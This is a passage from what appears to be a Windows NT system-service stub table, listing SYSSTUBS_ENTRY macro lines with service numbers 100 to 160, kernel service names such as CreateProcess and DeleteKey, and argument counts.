SYSSTUBS_ENTRY5 100, AccessCheckByTypeResultListAndAuditAlarm, 12
SYSSTUBS_ENTRY6 100, AccessCheckByTypeResultListAndAuditAlarm, 12
SYSSTUBS_ENTRY7 100, AccessCheckByTypeResultListAndAuditAlarm, 12
SYSSTUBS_ENTRY8 100, AccessCheckByTypeResultListAndAuditAlarm, 12
SYSSTUBS_ENTRY1 101, AccessCheckByTypeResultListAndAuditAlarmByHandle, 13
SYSSTUBS_ENTRY2 101, AccessCheckByTypeResultListAndAuditAlarmByHandle, 13
SYSSTUBS_ENTRY3 101, AccessCheckByTypeResultListAndAuditAlarmByHandle, 13
SYSSTUBS_ENTRY4 101, AccessCheckByTypeResultListAndAuditAlarmByHandle, 13
SYSSTUBS_ENTRY5 101, AccessCheckByTypeResultListAndAuditAlarmByHandle, 13
SYSSTUBS_ENTRY6 101, AccessCheckByTypeResultListAndAuditAlarmByHandle, 13
SYSSTUBS_ENTRY7 101, AccessCheckByTypeResultListAndAuditAlarmByHandle, 13
SYSSTUBS_ENTRY8 101, AccessCheckByTypeResultListAndAuditAlarmByHandle, 13
SYSSTUBS_ENTRY1 102, AddBootEntry, 0
SYSSTUBS_ENTRY2 102, AddBootEntry, 0
SYSSTUBS_ENTRY3 102, AddBootEntry, 0
SYSSTUBS_ENTRY4 102, AddBootEntry, 0
SYSSTUBS_ENTRY5 102, AddBootEntry, 0
SYSSTUBS_ENTRY6 102, AddBootEntry, 0
SYSSTUBS_ENTRY7 102, AddBootEntry, 0
SYSSTUBS_ENTRY8 102, AddBootEntry, 0
SYSSTUBS_ENTRY1 103, AddDriverEntry, 0
SYSSTUBS_ENTRY2 103, AddDriverEntry, 0
SYSSTUBS_ENTRY3 103, AddDriverEntry, 0
SYSSTUBS_ENTRY4 103, AddDriverEntry, 0
SYSSTUBS_ENTRY5 103, AddDriverEntry, 0
SYSSTUBS_ENTRY6 103, AddDriverEntry, 0
SYSSTUBS_ENTRY7 103, AddDriverEntry, 0
SYSSTUBS_ENTRY8 103, AddDriverEntry, 0
SYSSTUBS_ENTRY1 104, AdjustGroupsToken, 2
SYSSTUBS_ENTRY2 104, AdjustGroupsToken, 2
SYSSTUBS_ENTRY3 104, AdjustGroupsToken, 2
SYSSTUBS_ENTRY4 104, AdjustGroupsToken, 2
SYSSTUBS_ENTRY5 104, AdjustGroupsToken, 2
SYSSTUBS_ENTRY6 104, AdjustGroupsToken, 2
SYSSTUBS_ENTRY7 104, AdjustGroupsToken, 2
SYSSTUBS_ENTRY8 104, AdjustGroupsToken, 2
SYSSTUBS_ENTRY1 105, AlertResumeThread, 0
SYSSTUBS_ENTRY2 105, AlertResumeThread, 0
SYSSTUBS_ENTRY3 105, AlertResumeThread, 0
SYSSTUBS_ENTRY4 105, AlertResumeThread, 0
SYSSTUBS_ENTRY5 105, AlertResumeThread, 0
SYSSTUBS_ENTRY6 105, AlertResumeThread, 0
SYSSTUBS_ENTRY7 105, AlertResumeThread, 0
SYSSTUBS_ENTRY8 105, AlertResumeThread, 0
SYSSTUBS_ENTRY1 106, AlertThread, 0
SYSSTUBS_ENTRY2 106, AlertThread, 0
SYSSTUBS_ENTRY3 106, AlertThread, 0
SYSSTUBS_ENTRY4 106, AlertThread, 0
SYSSTUBS_ENTRY5 106, AlertThread, 0
SYSSTUBS_ENTRY6 106, AlertThread, 0
SYSSTUBS_ENTRY7 106, AlertThread, 0
SYSSTUBS_ENTRY8 106, AlertThread, 0
SYSSTUBS_ENTRY1 107, AllocateLocallyUniqueId, 0
SYSSTUBS_ENTRY2 107, AllocateLocallyUniqueId, 0
SYSSTUBS_ENTRY3 107, AllocateLocallyUniqueId, 0
SYSSTUBS_ENTRY4 107, AllocateLocallyUniqueId, 0
SYSSTUBS_ENTRY5 107, AllocateLocallyUniqueId, 0
SYSSTUBS_ENTRY6 107, AllocateLocallyUniqueId, 0
SYSSTUBS_ENTRY7 107, AllocateLocallyUniqueId, 0
SYSSTUBS_ENTRY8 107, AllocateLocallyUniqueId, 0
SYSSTUBS_ENTRY1 108, AllocateUserPhysicalPages, 0
SYSSTUBS_ENTRY2 108, AllocateUserPhysicalPages, 0
SYSSTUBS_ENTRY3 108, AllocateUserPhysicalPages, 0
SYSSTUBS_ENTRY4 108, AllocateUserPhysicalPages, 0
SYSSTUBS_ENTRY5 108, AllocateUserPhysicalPages, 0
SYSSTUBS_ENTRY6 108, AllocateUserPhysicalPages, 0
SYSSTUBS_ENTRY7 108, AllocateUserPhysicalPages, 0
SYSSTUBS_ENTRY8 108, AllocateUserPhysicalPages, 0
SYSSTUBS_ENTRY1 109, AllocateUuids, 0
SYSSTUBS_ENTRY2 109, AllocateUuids, 0
SYSSTUBS_ENTRY3 109, AllocateUuids, 0
SYSSTUBS_ENTRY4 109, AllocateUuids, 0
SYSSTUBS_ENTRY5 109, AllocateUuids, 0
SYSSTUBS_ENTRY6 109, AllocateUuids, 0
SYSSTUBS_ENTRY7 109, AllocateUuids, 0
SYSSTUBS_ENTRY8 109, AllocateUuids, 0
SYSSTUBS_ENTRY1 110, AreMappedFilesTheSame, 0
SYSSTUBS_ENTRY2 110, AreMappedFilesTheSame, 0
SYSSTUBS_ENTRY3 110, AreMappedFilesTheSame, 0
SYSSTUBS_ENTRY4 110, AreMappedFilesTheSame, 0
SYSSTUBS_ENTRY5 110, AreMappedFilesTheSame, 0
SYSSTUBS_ENTRY6 110, AreMappedFilesTheSame, 0
SYSSTUBS_ENTRY7 110, AreMappedFilesTheSame, 0
SYSSTUBS_ENTRY8 110, AreMappedFilesTheSame, 0
SYSSTUBS_ENTRY1 111, AssignProcessToJobObject, 0
SYSSTUBS_ENTRY2 111, AssignProcessToJobObject, 0
SYSSTUBS_ENTRY3 111, AssignProcessToJobObject, 0
SYSSTUBS_ENTRY4 111, AssignProcessToJobObject, 0
SYSSTUBS_ENTRY5 111, AssignProcessToJobObject, 0
SYSSTUBS_ENTRY6 111, AssignProcessToJobObject, 0
SYSSTUBS_ENTRY7 111, AssignProcessToJobObject, 0
SYSSTUBS_ENTRY8 111, AssignProcessToJobObject, 0
SYSSTUBS_ENTRY1 112, CancelDeviceWakeupRequest, 0
SYSSTUBS_ENTRY2 112, CancelDeviceWakeupRequest, 0
SYSSTUBS_ENTRY3 112, CancelDeviceWakeupRequest, 0
SYSSTUBS_ENTRY4 112, CancelDeviceWakeupRequest, 0
SYSSTUBS_ENTRY5 112, CancelDeviceWakeupRequest, 0
SYSSTUBS_ENTRY6 112, CancelDeviceWakeupRequest, 0
SYSSTUBS_ENTRY7 112, CancelDeviceWakeupRequest, 0
SYSSTUBS_ENTRY8 112, CancelDeviceWakeupRequest, 0
SYSSTUBS_ENTRY1 113, CompactKeys, 0
SYSSTUBS_ENTRY2 113, CompactKeys, 0
SYSSTUBS_ENTRY3 113, CompactKeys, 0
SYSSTUBS_ENTRY4 113, CompactKeys, 0
SYSSTUBS_ENTRY5 113, CompactKeys, 0
SYSSTUBS_ENTRY6 113, CompactKeys, 0
SYSSTUBS_ENTRY7 113, CompactKeys, 0
SYSSTUBS_ENTRY8 113, CompactKeys, 0
SYSSTUBS_ENTRY1 114, CompareTokens, 0
SYSSTUBS_ENTRY2 114, CompareTokens, 0
SYSSTUBS_ENTRY3 114, CompareTokens, 0
SYSSTUBS_ENTRY4 114, CompareTokens, 0
SYSSTUBS_ENTRY5 114, CompareTokens, 0
SYSSTUBS_ENTRY6 114, CompareTokens, 0
SYSSTUBS_ENTRY7 114, CompareTokens, 0
SYSSTUBS_ENTRY8 114, CompareTokens, 0
SYSSTUBS_ENTRY1 115, CompleteConnectPort, 0
SYSSTUBS_ENTRY2 115, CompleteConnectPort, 0
SYSSTUBS_ENTRY3 115, CompleteConnectPort, 0
SYSSTUBS_ENTRY4 115, CompleteConnectPort, 0
SYSSTUBS_ENTRY5 115, CompleteConnectPort, 0
SYSSTUBS_ENTRY6 115, CompleteConnectPort, 0
SYSSTUBS_ENTRY7 115, CompleteConnectPort, 0
SYSSTUBS_ENTRY8 115, CompleteConnectPort, 0
SYSSTUBS_ENTRY1 116, CompressKey, 0
SYSSTUBS_ENTRY2 116, CompressKey, 0
SYSSTUBS_ENTRY3 116, CompressKey, 0
SYSSTUBS_ENTRY4 116, CompressKey, 0
SYSSTUBS_ENTRY5 116, CompressKey, 0
SYSSTUBS_ENTRY6 116, CompressKey, 0
SYSSTUBS_ENTRY7 116, CompressKey, 0
SYSSTUBS_ENTRY8 116, CompressKey, 0
SYSSTUBS_ENTRY1 117, ConnectPort, 4
SYSSTUBS_ENTRY2 117, ConnectPort, 4
SYSSTUBS_ENTRY3 117, ConnectPort, 4
SYSSTUBS_ENTRY4 117, ConnectPort, 4
SYSSTUBS_ENTRY5 117, ConnectPort, 4
SYSSTUBS_ENTRY6 117, ConnectPort, 4
SYSSTUBS_ENTRY7 117, ConnectPort, 4
SYSSTUBS_ENTRY8 117, ConnectPort, 4
SYSSTUBS_ENTRY1 118, CreateDebugObject, 0
SYSSTUBS_ENTRY2 118, CreateDebugObject, 0
SYSSTUBS_ENTRY3 118, CreateDebugObject, 0
SYSSTUBS_ENTRY4 118, CreateDebugObject, 0
SYSSTUBS_ENTRY5 118, CreateDebugObject, 0
SYSSTUBS_ENTRY6 118, CreateDebugObject, 0
SYSSTUBS_ENTRY7 118, CreateDebugObject, 0
SYSSTUBS_ENTRY8 118, CreateDebugObject, 0
SYSSTUBS_ENTRY1 119, CreateDirectoryObject, 0
SYSSTUBS_ENTRY2 119, CreateDirectoryObject, 0
SYSSTUBS_ENTRY3 119, CreateDirectoryObject, 0
SYSSTUBS_ENTRY4 119, CreateDirectoryObject, 0
SYSSTUBS_ENTRY5 119, CreateDirectoryObject, 0
SYSSTUBS_ENTRY6 119, CreateDirectoryObject, 0
SYSSTUBS_ENTRY7 119, CreateDirectoryObject, 0
SYSSTUBS_ENTRY8 119, CreateDirectoryObject, 0
SYSSTUBS_ENTRY1 120, CreateEventPair, 0
SYSSTUBS_ENTRY2 120, CreateEventPair, 0
SYSSTUBS_ENTRY3 120, CreateEventPair, 0
SYSSTUBS_ENTRY4 120, CreateEventPair, 0
SYSSTUBS_ENTRY5 120, CreateEventPair, 0
SYSSTUBS_ENTRY6 120, CreateEventPair, 0
SYSSTUBS_ENTRY7 120, CreateEventPair, 0
SYSSTUBS_ENTRY8 120, CreateEventPair, 0
SYSSTUBS_ENTRY1 121, CreateIoCompletion, 0
SYSSTUBS_ENTRY2 121, CreateIoCompletion, 0
SYSSTUBS_ENTRY3 121, CreateIoCompletion, 0
SYSSTUBS_ENTRY4 121, CreateIoCompletion, 0
SYSSTUBS_ENTRY5 121, CreateIoCompletion, 0
SYSSTUBS_ENTRY6 121, CreateIoCompletion, 0
SYSSTUBS_ENTRY7 121, CreateIoCompletion, 0
SYSSTUBS_ENTRY8 121, CreateIoCompletion, 0
SYSSTUBS_ENTRY1 122, CreateJobObject, 0
SYSSTUBS_ENTRY2 122, CreateJobObject, 0
SYSSTUBS_ENTRY3 122, CreateJobObject, 0
SYSSTUBS_ENTRY4 122, CreateJobObject, 0
SYSSTUBS_ENTRY5 122, CreateJobObject, 0
SYSSTUBS_ENTRY6 122, CreateJobObject, 0
SYSSTUBS_ENTRY7 122, CreateJobObject, 0
SYSSTUBS_ENTRY8 122, CreateJobObject, 0
SYSSTUBS_ENTRY1 123, CreateJobSet, 0
SYSSTUBS_ENTRY2 123, CreateJobSet, 0
SYSSTUBS_ENTRY3 123, CreateJobSet, 0
SYSSTUBS_ENTRY4 123, CreateJobSet, 0
SYSSTUBS_ENTRY5 123, CreateJobSet, 0
SYSSTUBS_ENTRY6 123, CreateJobSet, 0
SYSSTUBS_ENTRY7 123, CreateJobSet, 0
SYSSTUBS_ENTRY8 123, CreateJobSet, 0
SYSSTUBS_ENTRY1 124, CreateKeyedEvent, 0
SYSSTUBS_ENTRY2 124, CreateKeyedEvent, 0
SYSSTUBS_ENTRY3 124, CreateKeyedEvent, 0
SYSSTUBS_ENTRY4 124, CreateKeyedEvent, 0
SYSSTUBS_ENTRY5 124, CreateKeyedEvent, 0
SYSSTUBS_ENTRY6 124, CreateKeyedEvent, 0
SYSSTUBS_ENTRY7 124, CreateKeyedEvent, 0
SYSSTUBS_ENTRY8 124, CreateKeyedEvent, 0
SYSSTUBS_ENTRY1 125, CreateMailslotFile, 4
SYSSTUBS_ENTRY2 125, CreateMailslotFile, 4
SYSSTUBS_ENTRY3 125, CreateMailslotFile, 4
SYSSTUBS_ENTRY4 125, CreateMailslotFile, 4
SYSSTUBS_ENTRY5 125, CreateMailslotFile, 4
SYSSTUBS_ENTRY6 125, CreateMailslotFile, 4
SYSSTUBS_ENTRY7 125, CreateMailslotFile, 4
SYSSTUBS_ENTRY8 125, CreateMailslotFile, 4
SYSSTUBS_ENTRY1 126, CreateMutant, 0
SYSSTUBS_ENTRY2 126, CreateMutant, 0
SYSSTUBS_ENTRY3 126, CreateMutant, 0
SYSSTUBS_ENTRY4 126, CreateMutant, 0
SYSSTUBS_ENTRY5 126, CreateMutant, 0
SYSSTUBS_ENTRY6 126, CreateMutant, 0
SYSSTUBS_ENTRY7 126, CreateMutant, 0
SYSSTUBS_ENTRY8 126, CreateMutant, 0
SYSSTUBS_ENTRY1 127, CreateNamedPipeFile, 10
SYSSTUBS_ENTRY2 127, CreateNamedPipeFile, 10
SYSSTUBS_ENTRY3 127, CreateNamedPipeFile, 10
SYSSTUBS_ENTRY4 127, CreateNamedPipeFile, 10
SYSSTUBS_ENTRY5 127, CreateNamedPipeFile, 10
SYSSTUBS_ENTRY6 127, CreateNamedPipeFile, 10
SYSSTUBS_ENTRY7 127, CreateNamedPipeFile, 10
SYSSTUBS_ENTRY8 127, CreateNamedPipeFile, 10
SYSSTUBS_ENTRY1 128, CreatePagingFile, 0
SYSSTUBS_ENTRY2 128, CreatePagingFile, 0
SYSSTUBS_ENTRY3 128, CreatePagingFile, 0
SYSSTUBS_ENTRY4 128, CreatePagingFile, 0
SYSSTUBS_ENTRY5 128, CreatePagingFile, 0
SYSSTUBS_ENTRY6 128, CreatePagingFile, 0
SYSSTUBS_ENTRY7 128, CreatePagingFile, 0
SYSSTUBS_ENTRY8 128, CreatePagingFile, 0
SYSSTUBS_ENTRY1 129, CreatePort, 1
SYSSTUBS_ENTRY2 129, CreatePort, 1
SYSSTUBS_ENTRY3 129, CreatePort, 1
SYSSTUBS_ENTRY4 129, CreatePort, 1
SYSSTUBS_ENTRY5 129, CreatePort, 1
SYSSTUBS_ENTRY6 129, CreatePort, 1
SYSSTUBS_ENTRY7 129, CreatePort, 1
SYSSTUBS_ENTRY8 129, CreatePort, 1
SYSSTUBS_ENTRY1 130, CreateProcess, 4
SYSSTUBS_ENTRY2 130, CreateProcess, 4
SYSSTUBS_ENTRY3 130, CreateProcess, 4
SYSSTUBS_ENTRY4 130, CreateProcess, 4
SYSSTUBS_ENTRY5 130, CreateProcess, 4
SYSSTUBS_ENTRY6 130, CreateProcess, 4
SYSSTUBS_ENTRY7 130, CreateProcess, 4
SYSSTUBS_ENTRY8 130, CreateProcess, 4
SYSSTUBS_ENTRY1 131, CreateProfile, 5
SYSSTUBS_ENTRY2 131, CreateProfile, 5
SYSSTUBS_ENTRY3 131, CreateProfile, 5
SYSSTUBS_ENTRY4 131, CreateProfile, 5
SYSSTUBS_ENTRY5 131, CreateProfile, 5
SYSSTUBS_ENTRY6 131, CreateProfile, 5
SYSSTUBS_ENTRY7 131, CreateProfile, 5
SYSSTUBS_ENTRY8 131, CreateProfile, 5
SYSSTUBS_ENTRY1 132, CreateSemaphore, 1
SYSSTUBS_ENTRY2 132, CreateSemaphore, 1
SYSSTUBS_ENTRY3 132, CreateSemaphore, 1
SYSSTUBS_ENTRY4 132, CreateSemaphore, 1
SYSSTUBS_ENTRY5 132, CreateSemaphore, 1
SYSSTUBS_ENTRY6 132, CreateSemaphore, 1
SYSSTUBS_ENTRY7 132, CreateSemaphore, 1
SYSSTUBS_ENTRY8 132, CreateSemaphore, 1
SYSSTUBS_ENTRY1 133, CreateSymbolicLinkObject, 0
SYSSTUBS_ENTRY2 133, CreateSymbolicLinkObject, 0
SYSSTUBS_ENTRY3 133, CreateSymbolicLinkObject, 0
SYSSTUBS_ENTRY4 133, CreateSymbolicLinkObject, 0
SYSSTUBS_ENTRY5 133, CreateSymbolicLinkObject, 0
SYSSTUBS_ENTRY6 133, CreateSymbolicLinkObject, 0
SYSSTUBS_ENTRY7 133, CreateSymbolicLinkObject, 0
SYSSTUBS_ENTRY8 133, CreateSymbolicLinkObject, 0
SYSSTUBS_ENTRY1 134, CreateTimer, 0
SYSSTUBS_ENTRY2 134, CreateTimer, 0
SYSSTUBS_ENTRY3 134, CreateTimer, 0
SYSSTUBS_ENTRY4 134, CreateTimer, 0
SYSSTUBS_ENTRY5 134, CreateTimer, 0
SYSSTUBS_ENTRY6 134, CreateTimer, 0
SYSSTUBS_ENTRY7 134, CreateTimer, 0
SYSSTUBS_ENTRY8 134, CreateTimer, 0
SYSSTUBS_ENTRY1 135, CreateToken, 9
SYSSTUBS_ENTRY2 135, CreateToken, 9
SYSSTUBS_ENTRY3 135, CreateToken, 9
SYSSTUBS_ENTRY4 135, CreateToken, 9
SYSSTUBS_ENTRY5 135, CreateToken, 9
SYSSTUBS_ENTRY6 135, CreateToken, 9
SYSSTUBS_ENTRY7 135, CreateToken, 9
SYSSTUBS_ENTRY8 135, CreateToken, 9
SYSSTUBS_ENTRY1 136, CreateWaitablePort, 1
SYSSTUBS_ENTRY2 136, CreateWaitablePort, 1
SYSSTUBS_ENTRY3 136, CreateWaitablePort, 1
SYSSTUBS_ENTRY4 136, CreateWaitablePort, 1
SYSSTUBS_ENTRY5 136, CreateWaitablePort, 1
SYSSTUBS_ENTRY6 136, CreateWaitablePort, 1
SYSSTUBS_ENTRY7 136, CreateWaitablePort, 1
SYSSTUBS_ENTRY8 136, CreateWaitablePort, 1
SYSSTUBS_ENTRY1 137, DebugActiveProcess, 0
SYSSTUBS_ENTRY2 137, DebugActiveProcess, 0
SYSSTUBS_ENTRY3 137, DebugActiveProcess, 0
SYSSTUBS_ENTRY4 137, DebugActiveProcess, 0
SYSSTUBS_ENTRY5 137, DebugActiveProcess, 0
SYSSTUBS_ENTRY6 137, DebugActiveProcess, 0
SYSSTUBS_ENTRY7 137, DebugActiveProcess, 0
SYSSTUBS_ENTRY8 137, DebugActiveProcess, 0
SYSSTUBS_ENTRY1 138, DebugContinue, 0
SYSSTUBS_ENTRY2 138, DebugContinue, 0
SYSSTUBS_ENTRY3 138, DebugContinue, 0
SYSSTUBS_ENTRY4 138, DebugContinue, 0
SYSSTUBS_ENTRY5 138, DebugContinue, 0
SYSSTUBS_ENTRY6 138, DebugContinue, 0
SYSSTUBS_ENTRY7 138, DebugContinue, 0
SYSSTUBS_ENTRY8 138, DebugContinue, 0
SYSSTUBS_ENTRY1 139, DeleteAtom, 0
SYSSTUBS_ENTRY2 139, DeleteAtom, 0
SYSSTUBS_ENTRY3 139, DeleteAtom, 0
SYSSTUBS_ENTRY4 139, DeleteAtom, 0
SYSSTUBS_ENTRY5 139, DeleteAtom, 0
SYSSTUBS_ENTRY6 139, DeleteAtom, 0
SYSSTUBS_ENTRY7 139, DeleteAtom, 0
SYSSTUBS_ENTRY8 139, DeleteAtom, 0
SYSSTUBS_ENTRY1 140, DeleteBootEntry, 0
SYSSTUBS_ENTRY2 140, DeleteBootEntry, 0
SYSSTUBS_ENTRY3 140, DeleteBootEntry, 0
SYSSTUBS_ENTRY4 140, DeleteBootEntry, 0
SYSSTUBS_ENTRY5 140, DeleteBootEntry, 0
SYSSTUBS_ENTRY6 140, DeleteBootEntry, 0
SYSSTUBS_ENTRY7 140, DeleteBootEntry, 0
SYSSTUBS_ENTRY8 140, DeleteBootEntry, 0
SYSSTUBS_ENTRY1 141, DeleteDriverEntry, 0
SYSSTUBS_ENTRY2 141, DeleteDriverEntry, 0
SYSSTUBS_ENTRY3 141, DeleteDriverEntry, 0
SYSSTUBS_ENTRY4 141, DeleteDriverEntry, 0
SYSSTUBS_ENTRY5 141, DeleteDriverEntry, 0
SYSSTUBS_ENTRY6 141, DeleteDriverEntry, 0
SYSSTUBS_ENTRY7 141, DeleteDriverEntry, 0
SYSSTUBS_ENTRY8 141, DeleteDriverEntry, 0
SYSSTUBS_ENTRY1 142, DeleteFile, 0
SYSSTUBS_ENTRY2 142, DeleteFile, 0
SYSSTUBS_ENTRY3 142, DeleteFile, 0
SYSSTUBS_ENTRY4 142, DeleteFile, 0
SYSSTUBS_ENTRY5 142, DeleteFile, 0
SYSSTUBS_ENTRY6 142, DeleteFile, 0
SYSSTUBS_ENTRY7 142, DeleteFile, 0
SYSSTUBS_ENTRY8 142, DeleteFile, 0
SYSSTUBS_ENTRY1 143, DeleteKey, 0
SYSSTUBS_ENTRY2 143, DeleteKey, 0
SYSSTUBS_ENTRY3 143, DeleteKey, 0
SYSSTUBS_ENTRY4 143, DeleteKey, 0
SYSSTUBS_ENTRY5 143, DeleteKey, 0
SYSSTUBS_ENTRY6 143, DeleteKey, 0
SYSSTUBS_ENTRY7 143, DeleteKey, 0
SYSSTUBS_ENTRY8 143, DeleteKey, 0
SYSSTUBS_ENTRY1 144, DeleteObjectAuditAlarm, 0
SYSSTUBS_ENTRY2 144, DeleteObjectAuditAlarm, 0
SYSSTUBS_ENTRY3 144, DeleteObjectAuditAlarm, 0
SYSSTUBS_ENTRY4 144, DeleteObjectAuditAlarm, 0
SYSSTUBS_ENTRY5 144, DeleteObjectAuditAlarm, 0
SYSSTUBS_ENTRY6 144, DeleteObjectAuditAlarm, 0
SYSSTUBS_ENTRY7 144, DeleteObjectAuditAlarm, 0
SYSSTUBS_ENTRY8 144, DeleteObjectAuditAlarm, 0
SYSSTUBS_ENTRY1 145, DeleteValueKey, 0
SYSSTUBS_ENTRY2 145, DeleteValueKey, 0
SYSSTUBS_ENTRY3 145, DeleteValueKey, 0
SYSSTUBS_ENTRY4 145, DeleteValueKey, 0
SYSSTUBS_ENTRY5 145, DeleteValueKey, 0
SYSSTUBS_ENTRY6 145, DeleteValueKey, 0
SYSSTUBS_ENTRY7 145, DeleteValueKey, 0
SYSSTUBS_ENTRY8 145, DeleteValueKey, 0
SYSSTUBS_ENTRY1 146, DisplayString, 0
SYSSTUBS_ENTRY2 146, DisplayString, 0
SYSSTUBS_ENTRY3 146, DisplayString, 0
SYSSTUBS_ENTRY4 146, DisplayString, 0
SYSSTUBS_ENTRY5 146, DisplayString, 0
SYSSTUBS_ENTRY6 146, DisplayString, 0
SYSSTUBS_ENTRY7 146, DisplayString, 0
SYSSTUBS_ENTRY8 146, DisplayString, 0
SYSSTUBS_ENTRY1 147, EnumerateBootEntries, 0
SYSSTUBS_ENTRY2 147, EnumerateBootEntries, 0
SYSSTUBS_ENTRY3 147, EnumerateBootEntries, 0
SYSSTUBS_ENTRY4 147, EnumerateBootEntries, 0
SYSSTUBS_ENTRY5 147, EnumerateBootEntries, 0
SYSSTUBS_ENTRY6 147, EnumerateBootEntries, 0
SYSSTUBS_ENTRY7 147, EnumerateBootEntries, 0
SYSSTUBS_ENTRY8 147, EnumerateBootEntries, 0
SYSSTUBS_ENTRY1 148, EnumerateDriverEntries, 0
SYSSTUBS_ENTRY2 148, EnumerateDriverEntries, 0
SYSSTUBS_ENTRY3 148, EnumerateDriverEntries, 0
SYSSTUBS_ENTRY4 148, EnumerateDriverEntries, 0
SYSSTUBS_ENTRY5 148, EnumerateDriverEntries, 0
SYSSTUBS_ENTRY6 148, EnumerateDriverEntries, 0
SYSSTUBS_ENTRY7 148, EnumerateDriverEntries, 0
SYSSTUBS_ENTRY8 148, EnumerateDriverEntries, 0
SYSSTUBS_ENTRY1 149, EnumerateSystemEnvironmentValuesEx, 0
SYSSTUBS_ENTRY2 149, EnumerateSystemEnvironmentValuesEx, 0
SYSSTUBS_ENTRY3 149, EnumerateSystemEnvironmentValuesEx, 0
SYSSTUBS_ENTRY4 149, EnumerateSystemEnvironmentValuesEx, 0
SYSSTUBS_ENTRY5 149, EnumerateSystemEnvironmentValuesEx, 0
SYSSTUBS_ENTRY6 149, EnumerateSystemEnvironmentValuesEx, 0
SYSSTUBS_ENTRY7 149, EnumerateSystemEnvironmentValuesEx, 0
SYSSTUBS_ENTRY8 149, EnumerateSystemEnvironmentValuesEx, 0
SYSSTUBS_ENTRY1 150, ExtendSection, 0
SYSSTUBS_ENTRY2 150, ExtendSection, 0
SYSSTUBS_ENTRY3 150, ExtendSection, 0
SYSSTUBS_ENTRY4 150, ExtendSection, 0
SYSSTUBS_ENTRY5 150, ExtendSection, 0
SYSSTUBS_ENTRY6 150, ExtendSection, 0
SYSSTUBS_ENTRY7 150, ExtendSection, 0
SYSSTUBS_ENTRY8 150, ExtendSection, 0
SYSSTUBS_ENTRY1 151, FilterToken, 2
SYSSTUBS_ENTRY2 151, FilterToken, 2
SYSSTUBS_ENTRY3 151, FilterToken, 2
SYSSTUBS_ENTRY4 151, FilterToken, 2
SYSSTUBS_ENTRY5 151, FilterToken, 2
SYSSTUBS_ENTRY6 151, FilterToken, 2
SYSSTUBS_ENTRY7 151, FilterToken, 2
SYSSTUBS_ENTRY8 151, FilterToken, 2
SYSSTUBS_ENTRY1 152, FlushInstructionCache, 0
SYSSTUBS_ENTRY2 152, FlushInstructionCache, 0
SYSSTUBS_ENTRY3 152, FlushInstructionCache, 0
SYSSTUBS_ENTRY4 152, FlushInstructionCache, 0
SYSSTUBS_ENTRY5 152, FlushInstructionCache, 0
SYSSTUBS_ENTRY6 152, FlushInstructionCache, 0
SYSSTUBS_ENTRY7 152, FlushInstructionCache, 0
SYSSTUBS_ENTRY8 152, FlushInstructionCache, 0
SYSSTUBS_ENTRY1 153, FlushKey, 0
SYSSTUBS_ENTRY2 153, FlushKey, 0
SYSSTUBS_ENTRY3 153, FlushKey, 0
SYSSTUBS_ENTRY4 153, FlushKey, 0
SYSSTUBS_ENTRY5 153, FlushKey, 0
SYSSTUBS_ENTRY6 153, FlushKey, 0
SYSSTUBS_ENTRY7 153, FlushKey, 0
SYSSTUBS_ENTRY8 153, FlushKey, 0
SYSSTUBS_ENTRY1 154, FlushVirtualMemory, 0
SYSSTUBS_ENTRY2 154, FlushVirtualMemory, 0
SYSSTUBS_ENTRY3 154, FlushVirtualMemory, 0
SYSSTUBS_ENTRY4 154, FlushVirtualMemory, 0
SYSSTUBS_ENTRY5 154, FlushVirtualMemory, 0
SYSSTUBS_ENTRY6 154, FlushVirtualMemory, 0
SYSSTUBS_ENTRY7 154, FlushVirtualMemory, 0
SYSSTUBS_ENTRY8 154, FlushVirtualMemory, 0
SYSSTUBS_ENTRY1 155, FlushWriteBuffer, 0
SYSSTUBS_ENTRY2 155, FlushWriteBuffer, 0
SYSSTUBS_ENTRY3 155, FlushWriteBuffer, 0
SYSSTUBS_ENTRY4 155, FlushWriteBuffer, 0
SYSSTUBS_ENTRY5 155, FlushWriteBuffer, 0
SYSSTUBS_ENTRY6 155, FlushWriteBuffer, 0
SYSSTUBS_ENTRY7 155, FlushWriteBuffer, 0
SYSSTUBS_ENTRY8 155, FlushWriteBuffer, 0
SYSSTUBS_ENTRY1 156, FreeUserPhysicalPages, 0
SYSSTUBS_ENTRY2 156, FreeUserPhysicalPages, 0
SYSSTUBS_ENTRY3 156, FreeUserPhysicalPages, 0
SYSSTUBS_ENTRY4 156, FreeUserPhysicalPages, 0
SYSSTUBS_ENTRY5 156, FreeUserPhysicalPages, 0
SYSSTUBS_ENTRY6 156, FreeUserPhysicalPages, 0
SYSSTUBS_ENTRY7 156, FreeUserPhysicalPages, 0
SYSSTUBS_ENTRY8 156, FreeUserPhysicalPages, 0
SYSSTUBS_ENTRY1 157, GetContextThread, 0
SYSSTUBS_ENTRY2 157, GetContextThread, 0
SYSSTUBS_ENTRY3 157, GetContextThread, 0
SYSSTUBS_ENTRY4 157, GetContextThread, 0
SYSSTUBS_ENTRY5 157, GetContextThread, 0
SYSSTUBS_ENTRY6 157, GetContextThread, 0
SYSSTUBS_ENTRY7 157, GetContextThread, 0
SYSSTUBS_ENTRY8 157, GetContextThread, 0
SYSSTUBS_ENTRY1 158, GetCurrentProcessorNumber, 0
SYSSTUBS_ENTRY2 158, GetCurrentProcessorNumber, 0
SYSSTUBS_ENTRY3 158, GetCurrentProcessorNumber, 0
SYSSTUBS_ENTRY4 158, GetCurrentProcessorNumber, 0
SYSSTUBS_ENTRY5 158, GetCurrentProcessorNumber, 0
SYSSTUBS_ENTRY6 158, GetCurrentProcessorNumber, 0
SYSSTUBS_ENTRY7 158, GetCurrentProcessorNumber, 0
SYSSTUBS_ENTRY8 158, GetCurrentProcessorNumber, 0
SYSSTUBS_ENTRY1 159, GetDevicePowerState, 0
SYSSTUBS_ENTRY2 159, GetDevicePowerState, 0
SYSSTUBS_ENTRY3 159, GetDevicePowerState, 0
SYSSTUBS_ENTRY4 159, GetDevicePowerState, 0
SYSSTUBS_ENTRY5 159, GetDevicePowerState, 0
SYSSTUBS_ENTRY6 159, GetDevicePowerState, 0
SYSSTUBS_ENTRY7 159, GetDevicePowerState, 0
SYSSTUBS_ENTRY8 159, GetDevicePowerState, 0
SYSSTUBS_ENTRY1 160, GetPlugPlayEvent, 0
SYSSTUBS_ENTRY2 160, GetPlugPlayEvent, 0
SYSSTUBS_ENTRY3 160, GetPlugPlayEvent, 0
SYSSTUBS_ENTRY4 160, GetPlugPlayEvent, 0
SYSSTUBS_ENTRY5 160, GetPlugPlayEvent, 0
SYSSTUBS_ENTRY6 160, GetPlugPlayEvent, 0
SYSSTUBS_ENTRY7 160, GetPlugPlayEvent, 0
SYSSTUBS_ENTRY8 160, GetPlugPlayEvent, 0
